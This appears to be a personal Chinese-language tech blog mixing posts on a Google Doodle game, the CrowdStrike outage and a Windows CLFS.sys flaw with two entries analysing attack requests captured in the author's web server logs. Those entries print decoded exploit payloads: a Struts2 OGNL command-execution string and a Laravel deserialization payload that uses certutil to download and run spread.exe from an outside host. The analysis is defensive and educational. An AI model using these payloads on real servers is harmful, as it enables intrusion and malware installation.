Google2024萬聖節小遊戲, 與之前用手勢打退鬼魂一樣, 用滑鼠有點難控制
Wey's note
只是一些隨手筆記
2024年10月30日 星期三
2024年10月24日 星期四
2024年9月25日 星期三
Google小遊戲 - 紀念爆米花問世
等了很久 Google終於又有小遊戲推出, 這次是紀念爆米花問世的小遊戲, 有三個角色可以選擇, 獨玩或者與其他人連線組隊, 有點難度, 就算可以順利過完第二關, 但是只剩我一個人就無法繼續玩第三關了(有第三關嗎?)😂
題外話, 奇怪現在用 OBS Studio要擷取螢幕影片時, 在作瀏覽器互動時鍵盤都沒反應, 所以方向鍵也都無法使用, 只好用 Windows內建的螢幕擷取功能來錄影了
#Google #Doodle #Popcorn
2024年9月11日 星期三
從 Web Log 學習系統漏洞 91
從荷蘭(45.148.120.50)來的不少攻擊
截取其中一段:
45.148.120.50 - - [08/Sep/2024:13:00:17 +0800] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
解碼後得到:
/index.action?redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}
這是一個 CVE-2013-2251遠端代碼執行漏洞, 該漏洞出現在 Apache Struts 2框架的 Dynamic Method Invocation (DMI)功能中, 允許攻擊者利用 HTTP請求執行任意代碼, 當應用程式使用 DMI 並且未妥善過濾或限制輸入時, 攻擊者可以通過提交特製的請求, 強制應用程式執行其傳入的任意方法, 這使得攻擊者可以在未經授權的情況下執行伺服器端代碼, 進而可能取得控制權或修改系統資料, 官方已釋出安全性更新, 使用者更新到較新的版本並停用不必要的功能
2024年8月18日 星期日
CVE-2024-6768漏洞, CLFS.sys造成Windows系統當機
猶記上個月微軟因為資安公司 CrowdStrike更新造成的全球系統大當機的事件還未完全處理完畢, 最近一間資安公司 Fortra公開了會造成 Windows藍色死亡畫面(BSOD)的漏洞 CVE-2024-6768, 攻擊者可對 CLFS.sys驅動程式發動 DoS攻擊, 進而導致 Windows系統當機
CVE-2024-6768是 Windows通用日誌檔案系統(CLFS.sys)驅動程式中的漏洞, 由輸入資料中指定數量的驗證不當引起, 此缺陷會導致不可恢復觸發 KeBugCheckEx功能並導致藍色死亡畫面(BSOD), 儘管套用了所有更新, 但該問題仍會影響 Windows 10、Windows 11、Windows Server 2016、Server 2019和 Server 2022的所有版本
2024年7月19日 星期五
微軟全球大當機
借用我之前的舊圖
微軟作業系統於今日全球大當機, 導致紐西蘭、澳洲、日本、印度等地區的用戶無法開機, 不少航班、交通運輸、銀行、電信、媒體及日本環球影城皆受影響, 由於Microsoft 365應用程式及 Azure雲端服務出現服務中斷導致全球的企業和用戶受到影響, 資安公司 CrowdStrike則承認是防毒系統更新出包所導致, 已知受影響服務包含了Microsoft 365管理中心、線上版SharePoint、商用版OneDrive、Teams、Intune、PowerBI、Fabric、Defender、Defender for Endpoint、Viva Engage, 微軟也正積極解決中
題外話, 我的系統更新都沒讓它自動跑更新, 而是等系統跳出更新通知時才再去按下更新按紐, 避免更新套件還未穩定就安裝下去
2024年7月13日 星期六
從 Web Log 學習系統漏洞 90
來自中國的 111.77.202.174 做了幾個攻擊
截出其中一段:
111.77.202.174 - - [12/Jul/2024:22:34:44 +0800] "GET /public/index.php/index?code=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A2%3A%22cmd.exe+%2Fc+certutil+-urlcache+-split+-f+http%3A%2F%2F2.2.2.1%3A19490%2Fspread.txt+C%3A%5CProgramData%5Cspread.exe+%26%26+C%3A%5CProgramData%5Cspread.exe%22%3B%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A2%3A%7Bs%3A22%3A%22%00%2A%00hasBeenBootstrapped%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7D%7D%7D%7D HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1"
轉碼後得到:
/public/index.php/index?code=O:44:"Illuminate\Foundation\Testing\PendingCommand":4:{s:10:"*command";s:6:"system";s:13:"*parameters";a:1:{i:0;s:2:"cmd.exe /c certutil -urlcache -split -f http://2.2.2.1:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe";}s:6:"*app";O:33:"Illuminate\Foundation\Application":2:{s:22:"*hasBeenBootstrapped";b:0;s:11:"*bindings";a:1:{s:35:"Illuminate\Contracts\Console\Kernel";a:1:{s:8:"concrete";s:33:"Illuminate\Foundation\Application";}}}s:4:"test";O:27:"Illuminate\Auth\GenericUser":1:{s:13:"*attributes";a:2:{s:14:"expectedOutput";a:1:{i:0;s:1:"1";}s:17:"expectedQuestions";a:1:{i:0;s:1:"1";}}}}
查詢了一下只知道是一個 Laravel反序列化漏洞(CVE-2019-9081), 具有 DDos攻擊及劫持主機挖礦的功能? 說明不多